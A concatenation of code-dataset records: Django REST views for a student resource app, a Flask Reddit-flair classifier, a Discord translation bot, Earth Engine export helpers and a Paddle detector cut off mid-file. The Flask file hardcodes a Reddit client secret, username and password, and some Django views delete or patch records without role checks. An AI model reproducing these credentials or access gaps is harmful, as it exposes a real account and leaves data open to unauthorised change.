Http404\n\n def get(self, request, id, format=None):\n user=User.objects.get(rollNumber=request.user)\n user_serializer = UserSerializer(user)\n\n role=user_serializer.data.get('role')\n\n product = self.get_object(id)\n serializer = interviewSerializer(product)\n verified=serializer.data.get('verified')\n # not returning anything if the page is not verified and user is a student\n if ((role == 'Student') and (verified == False)):\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n logging.info('Successful: GET: Interview Exp by id %s' % id)\n return Response(serializer.data)\n\n def patch(self, request, id):\n logging.info('Trying: PATCH: Interview Exp by id %s' % id)\n File = self.get_object(id)\n serializer = interviewSerializer(File, data=request.data,\n partial=True) # set partial=True to update a data partially\n if serializer.is_valid():\n serializer.save()\n logging.info('Successful: PATCH: Interview Exp by id %s, status %s' % (id,status.HTTP_201_CREATED))\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n \n def delete(self, request, id, format=None):\n logging.info('Trying: DELETE: Interview Exp by id %s' % id)\n Interview = self.get_object(id)\n Interview.delete()\n logging.info('Successful: DELETE: Interview Exp by id %s, status %s' % (id,status.HTTP_204_NO_CONTENT))\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\"\"\"\nFOR ADMIN VIEWS\n\"\"\"\n@api_view(['GET'])\ndef interviewAdminView(request):\n user=User.objects.get(rollNumber=request.user)\n user_serializer = UserSerializer(user)\n\n role=user_serializer.data.get('role')\n if (role=='admin'):\n product1 = Interview.objects.filter(verified=False)\n serializer = interviewSerializer(product1, many=True)\n return Response(serializer.data)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n@api_view(['GET'])\ndef pyqAdminView(request):\n user=User.objects.get(rollNumber=request.user)\n user_serializer = UserSerializer(user)\n\n role=user_serializer.data.get('role')\n if (role=='admin'):\n product1 = File.objects.filter(verified=False)\n serializer = FileSerializer(product1, many=True)\n return Response(serializer.data)\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n\"\"\"\nEND ADMIN VIEWS\n\"\"\"\n\nclass getData(APIView):\n\n def get(self, request, *args, **kwargs):\n allFiles = File.objects.all()\n for key in request.data.keys():\n value = request.data.get(key)\n \n\nfrom .models import File\nfrom .serializers import serializers\n\nfrom .serializers import FileSerializer\n\nclass getData(APIView):\n\n 
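Editor's note: the `patch` handlers in this record return nothing when `serializer.is_valid()` is false, so Django serves a 500 instead of a validation error. A hedged sketch of the usual error branch; `interviewSerializer` and `get_object` are the record's own names.

    from rest_framework.response import Response
    from rest_framework import status

    def patch(self, request, id):
        obj = self.get_object(id)
        serializer = interviewSerializer(obj, data=request.data, partial=True)
        if serializer.is_valid():
            serializer.save()
            return Response(serializer.data, status=status.HTTP_200_OK)
        # Without this branch the view falls through and returns None -> HTTP 500.
        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)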
def get(self, request, *args, **kwargs):\n logging.info('Trying: GET: PYQ Data')\n allFiles = File.objects.filter(verified=True)\n\n for key in request.GET.keys():\n value = request.GET.get(key)\n if (key == 'resourceType'):\n allFiles = allFiles.filter(resourceType=value)\n elif (key == 'semester'):\n allFiles = allFiles.filter(semester=value)\n elif (key == 'subject'):\n allFiles = allFiles.filter(subject=value)\n elif (key == 'year'):\n allFiles = allFiles.filter(year=value)\n elif (key == 'id'):\n allFiles = allFiles.filter(id=value)\n \n serializer = FileSerializer(allFiles, many=True)\n logging.info('Successful: GET: PYQ Data')\n return Response(serializer.data)\n\nclass patchData(APIView):\n def get_object(self, id):\n logging.info('Trying: GET: PYQ by id %s' % id)\n try:\n return File.objects.get(id=id)\n except File.DoesNotExist:\n raise Http404\n\n def patch(self, request, id):\n logging.info('Trying: PATCH: PYQ by id %s' % id)\n File = self.get_object(id)\n serializer = FileSerializer(File, data=request.data,\n partial=True) # set partial=True to update a data partially\n if serializer.is_valid():\n serializer.save()\n logging.info('Successful: PATCH: PYQ by id %s, status %s' % (id,status.HTTP_201_CREATED))\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n \n def get(self, request, id, format=None):\n user=User.objects.get(rollNumber=request.user)\n user_serializer = UserSerializer(user)\n\n role=user_serializer.data.get('role')\n\n File = self.get_object(id)\n serializer = FileSerializer(File)\n verified=serializer.data.get('verified')\n # not returning anything if the page is not verified and user is a student\n if ((role == 'Student') and (verified == False)):\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n logging.info('Successful: GET: PYQ by id %s' % id)\n return Response(serializer.data)\n\nclass postData(APIView):\n def post(self, request, *args, **kwargs): \n logging.info('Trying: POST: PYQ')\n user=User.objects.get(rollNumber=request.user)\n serializer = UserSerializer(user)\n name=serializer.data.get('rollNumber')+\"_\"+serializer.data.get('username')\n request.data['author']=name\n\n file_serializer = FileSerializer(data=request.data)\n if file_serializer.is_valid():\n file_serializer.save()\n logging.info('Successful: POST: PYQ, status %s' % status.HTTP_201_CREATED)\n return Response(file_serializer.data, status=status.HTTP_201_CREATED)\n else:\n logging.warning('Bad Request: POST: PYQ, status %s' % status.HTTP_400_BAD_REQUEST)\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\nclass deleteData(APIView):\n def get_object(self, id):\n logging.info('Trying: GET: PYQ by id %s' % id)\n try:\n return File.objects.get(id=id)\n except File.DoesNotExist:\n raise Http404\n\n def delete(self, request, id, format=None):\n logging.info('Trying: DELETE: PYQ by id %s' % id)\n File = self.get_object(id)\n File.delete()\n logging.info('Successful: DELETE: PYQ by id %s, status %s' % (id,status.HTTP_204_NO_CONTENT))\n return Response(status=status.HTTP_204_NO_CONTENT)\n\nclass getPostCommentsPYQ(APIView):\n def get(self, request, id):\n logging.info('Trying: GET: Comments for PYQ by id %s' % id)\n allComments = CommentsPYQ.objects.all().filter(pyq=id)\n\n commentsPYQSerializer = CommentsPYQSerializer(allComments, many=True)\n logging.info('Successful: GET: Comments for PYQ by id %s' % id)\n return Response(commentsPYQSerializer.data)\n\n def post(self, request, id):\n logging.info('Trying: POST: Comments for PYQ by id %s' % 
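Editor's note: `getData.get` above maps each query parameter to a queryset filter with an if/elif ladder. A dict-driven sketch with an explicit whitelist, assuming the same field names as the record; the helper name is illustrative.

    ALLOWED_FILTERS = {'resourceType', 'semester', 'subject', 'year', 'id'}

    def filter_files(queryset, params):
        # Whitelisting keys keeps arbitrary query params from
        # becoming ORM lookups.
        lookups = {k: v for k, v in params.items() if k in ALLOWED_FILTERS}
        return queryset.filter(**lookups)

    # usage, mirroring the record's GET handler:
    #   filter_files(File.objects.filter(verified=True), request.GET)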
id)\n user=User.objects.get(rollNumber=request.user)\n serializer = UserSerializer(user)\n name=serializer.data.get('rollNumber')+\"_\"+serializer.data.get('username')\n request.data['author']=name\n \n commentsPYQSerializer = CommentsPYQSerializer(data=request.data)\n \n if commentsPYQSerializer.is_valid():\n commentsPYQSerializer.save()\n logging.info('Successful: POST: Comments for PYQ by id %s, status %s' % (id,status.HTTP_201_CREATED))\n return Response(commentsPYQSerializer.data, status=status.HTTP_201_CREATED)\n else:\n logging.warning('Bad Request: POST: Comments for PYQ by id %s, status %s' % (id,status.HTTP_400_BAD_REQUEST))\n return Response(commentsPYQSerializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def get_comment(self, id):\n try:\n return CommentsPYQ.objects.get(id=id)\n except CommentsPYQ.DoesNotExist:\n raise Http404\n\n def delete(self, request, id):\n CommentsPYQ = self.get_comment(id)\n CommentsPYQ.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\nclass getPostCommentsExp(APIView):\n def get(self, request, id):\n logging.info('Trying: GET: Comments for Interview Exp by id %s' % id)\n allComments = CommentsExp.objects.all().filter(exp=id)\n\n commentsExpSerializer = CommentsExpSerializer(allComments, many=True)\n logging.info('Successful: GET: Comments for Interview Exp by id %s' % id)\n return Response(commentsExpSerializer.data)\n\n def post(self, request, id):\n logging.info('Trying: POST: Comments for Interview Exp by id %s' % id)\n user=User.objects.get(rollNumber=request.user)\n serializer = UserSerializer(user)\n name=serializer.data.get('rollNumber')+\"_\"+serializer.data.get('username')\n request.data['author']=name\n\n commentsExpSerializer = CommentsExpSerializer(data=request.data)\n \n if commentsExpSerializer.is_valid():\n commentsExpSerializer.save()\n logging.info('Successful: POST: Comments for Interview Exp by id %s, status %s' % (id,status.HTTP_201_CREATED))\n return Response(commentsExpSerializer.data, status=status.HTTP_201_CREATED)\n else:\n logging.warning('Bad Request: POST: Comments for Interview Exp by id %s, status %s' % (id,status.HTTP_400_BAD_REQUEST))\n return Response(commentsExpSerializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n def get_comment(self, id):\n try:\n return CommentsExp.objects.get(id=id)\n except CommentsExp.DoesNotExist:\n raise Http404\n\n def delete(self, request, id):\n CommentsExp = self.get_comment(id)\n CommentsExp.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n","sub_path":"SCPapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"632335755","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nimport pickle\r\nimport re\r\nimport flask\r\nimport praw\r\nfrom flask import Flask, render_template, request\r\n\r\napp=Flask(__name__)\r\n\r\nREPLACE_BY_SPACE_RE = re.compile('[/(){}\\[\\]\\|@,_;]')\r\nBAD_SYMBOLS_RE = re.compile('[^0-9a-z #+_]')\r\n\r\nflairs={1:\"AskIndia\",\r\n2:\"Non-Political\",\r\n3:\"[R]eddiquette\",\r\n4:\"Scheduled\",\r\n5:\"Photography\",\r\n6:\"Science/Technology\",\r\n7:\"Politics\",\r\n8:\"Business/Finance\",\r\n9:\"Policy/Economy\",\r\n10:\"Sports\",\r\n11:\"Food\",\r\n12:\"AMA\"\r\n}\r\n\r\n@app.route('/')\r\n\r\n@app.route('/index')\r\ndef 
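Editor's note: every view class in the views.py record reimplements the same try/`DoesNotExist`/`Http404` lookup. Django ships a shortcut for exactly this; the sketch below uses the record's `File` model as the example.

    from django.shortcuts import get_object_or_404

    def get_object(self, id):
        # Equivalent to the try/except blocks in the record: returns the row
        # or raises Http404, which DRF turns into a 404 response.
        return get_object_or_404(File, id=id)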
index():\r\n return flask.render_template('index.html')\r\n\r\n@app.route('/statistics')\r\ndef statistics():\r\n return flask.render_template('statistics.html')\r\n\r\n@app.route(\"/register\", methods=[\"POST\"])\r\ndef register():\r\n if request.method=='POST':\r\n nm = request.form.get(\"url\")\r\n mm=nm\r\n\r\n df1=pd.read_csv(\"https://raw.githubusercontent.com/abhisheksaxena1998/detector--redditv7/master/cleaned_reddit_alphabetav5.csv\")\r\n df1.dropna(inplace=True)\r\n df1.columns=['index','combined','flair'] \r\n #print (df1.head())\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(df1['combined'],df1['flair'],random_state=0)\r\n\r\n # Fit the CountVectorizer to the training data\r\n vect = CountVectorizer().fit(X_train)\r\n X_train_vectorized = vect.transform(X_train)\r\n model = RandomForestClassifier(n_estimators=500, criterion='entropy')\r\n model.fit(X_train_vectorized, y_train)\r\n reddit = praw.Reddit(client_id='WBTxS7rybznf7Q', client_secret='vJUTUflXITBsQMxeviOfG8mCZoA', user_agent='projectreddit', username='Mysterious_abhE', password='Saxena0705')\r\n #url=\"https://www.reddit.com/r/MapPorn/comments/a3p0uq/an_image_of_gps_tracking_of_multiple_wolves_in/\"\r\n submission = reddit.submission(url=nm)\r\n #print (submission.comments[0])\r\n #print (submission.title)\r\n submission.comments.replace_more(limit=0)\r\n #co=[]\r\n tr=[]\r\n c=''\r\n for top_level_comment in submission.comments: \r\n c+=top_level_comment.body \r\n\r\n\r\n tr=submission.title+nm+c\r\n #processed_tweets=[]\r\n #for tweet in range(len(tr)): \r\n processed_tweet = re.sub(r'\\W', ' ', str(tr))\r\n\r\n \r\n # Remove all the special characters\r\n \r\n processed_tweet = re.sub(r'http\\S+', ' ', processed_tweet)\r\n \r\n #processed_tweet = re.sub(r'https?:\\/\\/+', ' ', processed_tweet)\r\n \r\n #processed_tweet=re.sub(r'\\w+:\\/{2}[\\d\\w-]+(\\.[\\d\\w-]+)*(?:(?:\\/[^\\s/]*))*', ' ',processed_tweet)\r\n \r\n processed_tweet=re.sub(r'www\\S+', ' ', processed_tweet)\r\n \r\n processed_tweet=re.sub(r'co \\S+', ' ', processed_tweet)\r\n # remove all single characters\r\n processed_tweet = re.sub(r'\\s+[a-zA-Z]\\s+', ' ', processed_tweet)\r\n # Remove single characters from the start\r\n processed_tweet = re.sub(r'\\^[a-zA-Z]\\s+', ' ', processed_tweet) \r\n \r\n # Substituting multiple spaces with single space\r\n processed_tweet= re.sub(r'\\s+', ' ', processed_tweet, flags=re.I)\r\n \r\n # Removing prefixed 'b'\r\n processed_tweet = re.sub(r'^b\\s+', ' ', processed_tweet)\r\n \r\n processed_tweet = re.sub(r'\\d','',processed_tweet)\r\n \r\n processed_tweet= re.sub(r'\\s+', ' ', processed_tweet, flags=re.I)\r\n\r\n \r\n # Converting to Lowercase\r\n processed_tweet = processed_tweet.lower()\r\n processed_tweet=processed_tweet.replace('_',' ')\r\n \r\n #processed_tweets.append(processed_tweet)\r\n \r\n #print ((processed_tweet)) #print(model.predict(vect.transform([tr])))\r\n #filename='combined_modelv5_updated.pkl'\r\n\r\n #pickle.dump(model, open(filename, 'wb'))\r\n #load_lr_model =pickle.load(open(filename, 'rb'))\r\n #print (load_lr_model.predict(vect.transform([tr])))\r\n\r\n\r\n return flask.render_template('result.html',prediction=flairs[int(model.predict(vect.transform([processed_tweet])))],url=mm)\r\n \r\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496119967","text":"'''\n__author__ = \"Mateo Cetti, Ivan Nuñez, Francesco 
Silvetti\"\n__copyright__ = \"Copyright 2018, The TOPO Project\"\n__credits__ = [\"Mateo Cetti\", \"Ivan Nuñez\", \"Francesco Silvetti\"]\n__license__ = \"MIT\"\n__version__ = \"0.1\"\n__maintainer__ = [\"Mateo Cetti\", \"Ivan Nuñez\", \"Francesco Silvetti\"]\n__email__ = None\n__status__ = \"Work in progress\"\n'''\n\nimport discord #Import Discord.py.\nimport asyncio\nfrom discord.ext.commands import Bot\nfrom discord.ext import commands\n\nfrom googletrans import Translator #Google Translator API.\n\nimport time\nimport json\nfrom utilities.functions import *\n\nclass Bot(commands.Bot):\n\n def __init__(self, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\ndef main():\n\n bot = Bot(command_prefix=commands.when_mentioned_or(\"-\"), description='This is a BOT.', pm_help=True) #Instanciate the Bot.\n\n @bot.event\n async def on_ready():\n '''\n This method is called when the bot is succesfully loged in into Discord.\n '''\n print(\"READY\")\n print(bot.user.name)\n print(bot.user.id)\n print('------')\n\n @bot.event\n async def on_message(message):\n '''\n This method is called when the bot receives a message from any Discord client.\n '''\n await bot.process_commands(message) #MAGIC\n\n print(str(time.time()) + ' :Message received from: ' + str(message.author.id) + ' , And says: ' + str(message.content))\n\n if (contains_not_allowed_characters(message)):\n\n await bot.delete_message(message)\n\n @bot.command(pass_context=True)\n async def japanify(ctx, *args):\n '''\n Translates Roman text to Japanese.\n '''\n translator = Translator()\n translation = translator.translate(\" \".join(args), dest=\"ja\")\n await bot.send_message(ctx.message.author, \"Original (Roman): {}\\nTranslated (Japanese): {}\".format(\" \".join(args), translation.text))\n\n @bot.command(pass_context=True)\n async def romanify(ctx, *args):\n '''\n Translates Japanese text to Roman.\n '''\n translator = Translator()\n translation = translator.translate(\" \".join(args), dest=\"es\")\n await bot.send_message(ctx.message.author, \"Original (Japanese): {}\\nTranslated (Roman): {}\".format(\" \".join(args), translation.text))\n\n try:\n\n with open('botinfo.json') as info_file:\n\n data = json.load(info_file)\n\n bot.run(data['bot'][0]['token']) #Runs TOPO using the token\n\n except Exception as e:\n\n print(e)\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"217604482","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n \n ## Iterative - O(1) space complexity\n prev = None\n cur = head\n \n while cur:\n tmp_ll = cur.next\n cur.next = prev\n prev = cur\n cur = tmp_ll\n \n return prev\n \n ## Iterative - O(n) space complexity\n# stack = []\n \n# while head:\n# stack.append(head.val)\n# head = head.next\n \n# if stack == []: return None\n \n# head = ListNode(stack.pop())\n# cur = head\n# while stack:\n# node = ListNode(stack.pop())\n# cur.next = node\n# cur = cur.next\n \n# return head\n","sub_path":"Easy/reverseList.py","file_name":"reverseList.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"515450728","text":"from typing import Union\n\nimport ee\nfrom rx import concat\nfrom 
rx.operators import flat_map\nfrom sepal.rx.workqueue import WorkQueue\nfrom sepal.task.rx.observables import progress\n\nfrom .asset import delete_asset\nfrom .observables import enqueue, execute\nfrom .task import execute_task\n\n\ndef export_image_to_asset(\n credentials,\n image: ee.Image,\n description: str = None,\n asset_id: str = None,\n pyramiding_policy: dict = None,\n dimensions=None,\n region: ee.Geometry = None,\n scale: int = None,\n crs: str = None,\n crs_transform: str = None,\n max_pixels: Union[int, float] = None,\n retries: int = 0\n):\n asset_id, description = _init_asset_id_and_description(asset_id, description)\n\n def create_task():\n task = ee.batch.Export.image.toAsset(image=image, description=description, assetId=asset_id,\n pyramidingPolicy=pyramiding_policy, dimensions=dimensions, region=region, scale=scale, crs=crs,\n crsTransform=crs_transform, maxPixels=max_pixels)\n task.asset_id = asset_id\n return task\n\n return _export_to_asset(\n credentials,\n create_task=create_task,\n description='export_image_to_asset(asset_id={}, description={}'.format(asset_id, description),\n retries=retries\n )\n\n\ndef export_table_to_asset(\n credentials,\n collection: ee.FeatureCollection,\n description: str = None,\n asset_id: str = None,\n retries: int = 0\n):\n asset_id, description = _init_asset_id_and_description(asset_id, description)\n\n def create_task():\n task = ee.batch.Export.table.toAsset(collection=collection, description=description, assetId=asset_id)\n task.asset_id = asset_id\n return task\n\n return _export_to_asset(\n credentials,\n create_task=create_task,\n description='export_table_to_asset(asset_id={}, description={}'.format(asset_id, description),\n retries=retries\n )\n\n\ndef export_image_to_drive(\n credentials,\n image: ee.Image,\n description: str,\n folder: str = None,\n file_name_prefix: str = None,\n dimensions=None,\n region: ee.Geometry = None,\n scale: int = None,\n crs: str = None,\n crs_transform: str = None,\n max_pixels: int = None,\n file_dimensions=None,\n skip_empty_tiles=None,\n file_format: str = None,\n format_options: str = None,\n retries: int = 0\n):\n def create_task():\n return ee.batch.Export.image.toDrive(\n image=image,\n description=description,\n folder=folder,\n fileNamePrefix=file_name_prefix,\n dimensions=dimensions,\n region=region,\n scale=scale,\n crs=crs,\n crsTransform=crs_transform,\n maxPixels=max_pixels,\n fileDimensions=file_dimensions,\n skipEmptyTiles=skip_empty_tiles,\n fileFormat=file_format,\n formatOptions=format_options\n )\n\n return _export_to_drive(\n credentials,\n create_task=create_task,\n description='export_image_to_drive(description={}, folder={}, fileNamePrefix={}'.format(\n description, folder, file_name_prefix\n ),\n retries=retries\n )\n\n\ndef export_table_to_drive(\n credentials,\n collection: ee.FeatureCollection,\n description: str = None,\n folder: str = None,\n file_name_prefix: str = None,\n file_format: str = None,\n selectors=None,\n retries: int = 0\n):\n def create_task():\n return ee.batch.Export.table.toDrive(\n collection=collection,\n description=description,\n folder=folder,\n fileNamePrefix=file_name_prefix,\n fileFormat=file_format,\n selectors=selectors\n )\n\n return _export_to_drive(\n credentials,\n create_task=create_task,\n description='export_table_to_drive(description={}, folder={}, fileNamePrefix={}'.format(\n description, folder, file_name_prefix\n ),\n retries=retries\n )\n\n\ndef _init_asset_id_and_description(asset_id, description):\n if asset_id and not 
description:\n i = asset_id.rfind('/')\n description = asset_id[i + 1:]\n elif description and not asset_id:\n asset_id = '{}/{}'.format(_first_asset_root(), description)\n elif not asset_id and not description:\n raise ValueError('asset_id or description must be specified when exporting asset')\n return asset_id, description\n\n\ndef _first_asset_root():\n asset_roots = [bucket['id'] for bucket in ee.data.listBuckets()['assets']]\n if not asset_roots:\n raise Exception('User has no GEE asset roots: {}'.format(ee.Credentials()))\n return asset_roots[0]\n\n\ndef _export_to_asset(credentials, create_task, description, retries):\n def create_observable():\n return execute(credentials, create_task, description=description).pipe(\n flat_map(lambda task: delete_asset(credentials, task.asset_id).pipe(\n flat_map(lambda _: execute_task(credentials, task))\n ))\n )\n\n return _export(\n credentials,\n create_observable=create_observable,\n description=description,\n retries=retries\n )\n\n\ndef _export_to_drive(credentials, create_task, description, retries):\n return _export(\n credentials,\n create_observable=lambda: execute_task(credentials, create_task()),\n description=description,\n retries=retries\n )\n\n\n# Work (i.e. exports) is grouped by credentials, limiting concurrent exports per credentials\n_ee_exports = WorkQueue(\n concurrency_per_group=5,\n description='earth-engine-exports'\n)\n\n\ndef _export(credentials, create_observable, description, retries):\n return concat(\n progress(\n default_message='Submitting export task to Google Earth Engine...',\n message_key='tasks.ee.export.pending'\n ),\n enqueue(\n credentials,\n queue=_ee_exports,\n action=create_observable,\n description=description,\n retries=retries\n )\n )\n","sub_path":"modules/google-earth-engine/docker/sepal-ee/sepal/ee/rx/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"134720482","text":"from paddle.inference import Config\nfrom functools import reduce\nimport os\nimport cv2\nimport yaml\nfrom paddle.inference import create_predictor\nimport paddle\nimport numpy as np\nfrom paddel_version.preprocess import preprocess,create_inputs,Resize,NormalizeImage,Permute,PadStride,LetterBoxResize\nfrom paddel_version.visualize import visualize_box_mask\npaddle.enable_static()\n\n\n\nclass PredictConfig():\n \"\"\"读取配置文件\n Args:\n model_dir (str): root path of model.yml\n \"\"\"\n def __init__(self, model_dir):\n # parsing Yaml config for Preprocess\n deploy_file = os.path.join(model_dir, 'infer_cfg.yml')\n with open(deploy_file) as f:\n yml_conf = yaml.safe_load(f)\n\n self.arch = yml_conf['arch']\n self.preprocess_infos = yml_conf['Preprocess']\n self.min_subgraph_size = yml_conf['min_subgraph_size']\n self.labels = yml_conf['label_list']\n self.mask = False\n self.use_dynamic_shape = yml_conf['use_dynamic_shape']\n if 'mask' in yml_conf:\n self.mask = yml_conf['mask']\n self.tracker = None\n if 'tracker' in yml_conf:\n self.tracker = yml_conf['tracker']\n self.print_config()\n\n def print_config(self):\n print('----------- Model Configuration -----------')\n print('%s: %s' % ('Model Arch', self.arch))\n print('%s: ' % ('Transform Order'))\n for op_info in self.preprocess_infos:\n print('--%s: %s' % ('transform op', op_info['type']))\n print('--------------------------------------------')\n\nclass Detector(object):\n \"\"\"\n Args:\n pred_config (object): config of model, defined by 
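Editor's note: `_init_asset_id_and_description` in the export.py record derives whichever of the two arguments is missing. Two illustrative calls; the asset ids and the `users/me` root are hypothetical.

    # asset_id given, description derived from its last path segment:
    #   _init_asset_id_and_description('users/me/exports/ndvi_2020', None)
    #   -> ('users/me/exports/ndvi_2020', 'ndvi_2020')
    #
    # description given, asset_id prefixed with the caller's first asset root:
    #   _init_asset_id_and_description(None, 'ndvi_2020')
    #   -> ('users/me/ndvi_2020', 'ndvi_2020')   # assuming root 'users/me'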
`Config(model_dir)`\n model_dir (str): root path of model.pdiparams, model.pdmodel and infer_cfg.yml\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16)\n batch_size (int): size of pre batch in inference\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n cpu_threads (int): cpu threads\n enable_mkldnn (bool): whether to open MKLDNN\n \"\"\"\n\n def __init__(self,\n pred_config,\n model_dir,\n device='GPU',\n run_mode='fluid',\n batch_size=1,\n trt_min_shape=1,\n trt_max_shape=1280,\n trt_opt_shape=640,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n self.pred_config = pred_config\n self.predictor, self.config = load_predictor(\n model_dir,\n run_mode=run_mode,\n batch_size=batch_size,\n min_subgraph_size=self.pred_config.min_subgraph_size,\n device=device,\n use_dynamic_shape=self.pred_config.use_dynamic_shape,\n trt_min_shape=trt_min_shape,\n trt_max_shape=trt_max_shape,\n trt_opt_shape=trt_opt_shape,\n trt_calib_mode=trt_calib_mode,\n cpu_threads=cpu_threads,\n enable_mkldnn=enable_mkldnn)\n # self.det_times = Timer()\n self.cpu_mem, self.gpu_mem, self.gpu_util = 0, 0, 0\n\n def preprocess(self, image_list):\n preprocess_ops = []\n for op_info in self.pred_config.preprocess_infos:\n new_op_info = op_info.copy()\n op_type = new_op_info.pop('type')\n preprocess_ops.append(eval(op_type)(**new_op_info))\n\n input_im_lst = []\n input_im_info_lst = []\n for im_path in image_list:\n im, im_info = preprocess(im_path, preprocess_ops)\n input_im_lst.append(im)\n input_im_info_lst.append(im_info)\n inputs = create_inputs(input_im_lst, input_im_info_lst)\n return inputs\n\n def postprocess(self,\n np_boxes,\n np_masks,\n inputs,\n np_boxes_num,\n threshold=0.5):\n # postprocess output of predictor\n results = {}\n results['boxes'] = np_boxes\n results['boxes_num'] = np_boxes_num\n if np_masks is not None:\n results['masks'] = np_masks\n return results\n\n def predict(self, image_list, threshold=0.5, warmup=0, repeats=1):\n '''\n Args:\n image_list (list): list of image\n threshold (float): threshold of predicted box' score\n Returns:\n results (dict): include 'boxes': np.ndarray: shape:[N,6], N: number of box,\n matix element:[class, score, x_min, y_min, x_max, y_max]\n MaskRCNN's results include 'masks': np.ndarray:\n shape: [N, im_h, im_w]\n '''\n # self.det_times.preprocess_time_s.start()\n inputs = self.preprocess(image_list)\n # self.det_times.preprocess_time_s.end()\n np_boxes, np_masks = None, None\n input_names = self.predictor.get_input_names()\n for i in range(len(input_names)):\n input_tensor = self.predictor.get_input_handle(input_names[i])\n input_tensor.copy_from_cpu(inputs[input_names[i]])\n for i in range(warmup):\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n boxes_tensor = self.predictor.get_output_handle(output_names[0])\n np_boxes = boxes_tensor.copy_to_cpu()\n if self.pred_config.mask:\n masks_tensor = self.predictor.get_output_handle(output_names[2])\n np_masks = masks_tensor.copy_to_cpu()\n\n # self.det_times.inference_time_s.start()\n for i in range(repeats):\n self.predictor.run()\n output_names = self.predictor.get_output_names()\n boxes_tensor = 
self.predictor.get_output_handle(output_names[0])\n np_boxes = boxes_tensor.copy_to_cpu()\n boxes_num = self.predictor.get_output_handle(output_names[1])\n np_boxes_num = boxes_num.copy_to_cpu()\n if self.pred_config.mask:\n masks_tensor = self.predictor.get_output_handle(output_names[2])\n np_masks = masks_tensor.copy_to_cpu()\n # self.det_times.inference_time_s.end(repeats=repeats)\n #\n # self.det_times.postprocess_time_s.start()\n results = []\n if reduce(lambda x, y: x * y, np_boxes.shape) < 6:\n print('[WARNNING] No object detected.')\n results = {'boxes': np.array([[]]), 'boxes_num': [0]}\n else:\n results = self.postprocess(\n np_boxes, np_masks, inputs, np_boxes_num, threshold=threshold)\n # self.det_times.postprocess_time_s.end()\n # self.det_times.img_num += len(image_list)\n return results\n\n # def get_timer(self):\n # return self.det_times\n\ndef load_predictor(model_dir,\n run_mode='fluid',\n batch_size=1,\n device='GPU',\n min_subgraph_size=3,\n use_dynamic_shape=False,\n trt_min_shape=1,\n trt_max_shape=1280,\n trt_opt_shape=640,\n trt_calib_mode=False,\n cpu_threads=1,\n enable_mkldnn=False):\n \"\"\"set AnalysisConfig, generate AnalysisPredictor\n Args:\n model_dir (str): root path of __model__ and __params__\n device (str): Choose the device you want to run, it can be: CPU/GPU/XPU, default is CPU\n run_mode (str): mode of running(fluid/trt_fp32/trt_fp16/trt_int8)\n use_dynamic_shape (bool): use dynamic shape or not\n trt_min_shape (int): min shape for dynamic shape in trt\n trt_max_shape (int): max shape for dynamic shape in trt\n trt_opt_shape (int): opt shape for dynamic shape in trt\n trt_calib_mode (bool): If the model is produced by TRT offline quantitative\n calibration, trt_calib_mode need to set True\n Returns:\n predictor (PaddlePredictor): AnalysisPredictor\n Raises:\n ValueError: predict by TensorRT need device == 'GPU'.\n \"\"\"\n if device != 'GPU' and run_mode != 'fluid':\n raise ValueError(\n \"Predict by TensorRT mode: {}, expect device=='GPU', but device == {}\"\n .format(run_mode, device))\n config = Config(\n os.path.join(model_dir, 'model.pdmodel'),\n os.path.join(model_dir, 'model.pdiparams'))\n if device == 'GPU':\n # initial GPU memory(M), device ID\n config.enable_use_gpu(200, 0)\n # optimize graph and fuse op\n config.switch_ir_optim(True)\n elif device == 'XPU':\n config.enable_xpu(10 * 1024 * 1024)\n else:\n config.disable_gpu()\n config.set_cpu_math_library_num_threads(cpu_threads)\n if enable_mkldnn:\n try:\n # cache 10 different shapes for mkldnn to avoid memory leak\n config.set_mkldnn_cache_capacity(10)\n config.enable_mkldnn()\n except Exception as e:\n print(\n \"The current environment does not support `mkldnn`, so disable mkldnn.\"\n )\n pass\n\n precision_map = {\n 'trt_int8': Config.Precision.Int8,\n 'trt_fp32': Config.Precision.Float32,\n 'trt_fp16': Config.Precision.Half\n }\n if run_mode in precision_map.keys():\n config.enable_tensorrt_engine(\n 